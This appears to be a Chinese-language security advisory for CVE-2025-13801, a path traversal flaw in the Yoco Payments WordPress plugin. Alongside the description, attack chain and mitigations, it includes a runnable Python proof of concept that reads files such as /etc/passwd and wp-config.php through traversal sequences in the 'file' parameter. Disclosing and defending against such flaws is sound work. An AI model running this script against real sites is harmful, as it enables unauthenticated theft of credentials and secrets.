CVE-2025-13801 WordPress Yoco Payments插件路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-13801

漏洞类型

路径遍历

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Yoco Payments WordPress插件

漏洞概述

CVE-2025-13801是WordPress平台Yoco Payments支付网关插件中的一个高危路径遍历漏洞。该漏洞存在于插件的所有版本中，直至并包括3.9.0版本。攻击者可以利用插件中file参数存在的输入验证缺陷，通过构造特殊的文件路径请求，未经认证即可读取服务器上的任意文件内容。此漏洞无需任何用户交互，攻击者只需通过发送特制的HTTP请求即可利用。由于该插件处理日志文件的功能存在路径遍历问题，攻击者可利用../等目录遍历字符访问Web根目录之外的文件系统资源。成功利用此漏洞可能导致敏感信息泄露，包括但不限于配置文件、数据库凭证、其他插件的敏感数据、.env文件、wp-config.php配置信息等。鉴于该漏洞的CVSS评分为7.5，属于高危级别，且利用难度低、无需认证，建议所有使用该插件的用户立即采取修复措施。

技术细节

该路径遍历漏洞源于Yoco Payments插件的日志处理功能存在输入验证不足的问题。具体而言，插件的Logs.php文件中处理file参数时，未对用户输入进行充分的路径安全验证。攻击者可以通过在file参数中注入../等目录遍历序列，配合目标文件名，实现对服务器任意文件的读取。根据参考链接显示，问题代码位于Logs.php的第25行和第59行附近。攻击者利用此漏洞可以读取：1) WordPress配置文件wp-config.php，其中包含数据库凭证和认证密钥；2) .htaccess和.htpasswd文件；3) 其他插件和主题文件；4) 系统敏感文件如/etc/passwd；5) 包含API密钥和令牌的其他配置文件。由于该插件未对file参数进行路径规范化或白名单验证，攻击者可以构造诸如../../../etc/passwd或../../../wp-config.php的请求来读取目标文件。漏洞的利用不需要任何认证，攻击者可以直接通过HTTP请求触发。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站使用的WordPress平台，并确认安装了Yoco Payments插件（版本≤3.9.0）

STEP 2

步骤2

攻击者定位插件中存在路径遍历漏洞的Logs.php文件及其file参数

STEP 3

步骤3

攻击者构造包含目录遍历序列（如../../../）的恶意file参数请求

STEP 4

步骤4

攻击者发送HTTP GET请求到插件的Logs.php处理器，指定目标文件路径

STEP 5

步骤5

服务器端代码未对file参数进行安全验证，直接读取指定路径文件内容

STEP 6

步骤6

攻击者获取目标文件内容，可能包含敏感配置信息、数据库凭证、API密钥等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

def exploit_cve_2025_13801(target_url, file_to_read):
    """
    PoC for CVE-2025-13801: Yoco Payments WordPress Plugin Path Traversal
    
    This PoC demonstrates how an unauthenticated attacker can read arbitrary files
    on the server through the vulnerable 'file' parameter in the Yoco Payments plugin.
    
    Usage:
        python exploit.py http://target-wordpress-site.com /etc/passwd
    """
    
    # Target endpoint - typically in the WordPress plugins path
    # The vulnerable parameter is 'file' which allows path traversal
    vulnerable_endpoint = f"{target_url}/wp-content/plugins/yoco-payment-gateway/"
    
    # Construct path traversal payload
    # Using ../../../ to navigate out of the plugin directory
    payload = "?file=" + "../" * 6 + file_to_read.lstrip("/")
    
    full_url = vulnerable_endpoint + "src/Helpers/Logs.php" + payload
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting CVE-2025-13801")
    print(f"[*] Attempting to read: {file_to_read}")
    print(f"[*] Request URL: {full_url}")
    
    try:
        response = requests.get(full_url, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Success! File contents:")
            print("=" * 50)
            print(response.text)
            print("=" * 50)
        else:
            print(f"[-] Failed with status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python exploit.py <target_url> <file_to_read>")
        print("Example: python exploit.py http://example.com /etc/passwd")
        sys.exit(1)
    
    target = sys.argv[1]
    file_path = sys.argv[2]
    exploit_cve_2025_13801(target, file_path)

影响范围

Yoco Payments WordPress插件 ≤ 3.9.0

防御指南

临时缓解措施

在官方补丁发布之前，可以采取以下临时缓解措施：1) 临时禁用Yoco Payments插件直至漏洞修复；2) 通过Web服务器配置（如.htaccess）限制对Logs.php文件的直接访问；3) 在Nginx或Apache配置中禁用包含../序列的请求；4) 实施基于Web应用防火墙的路径遍历攻击防护规则；5) 监控访问日志中异常的Logs.php请求模式。建议优先考虑禁用插件或实施访问限制，待官方发布安全更新后立即升级。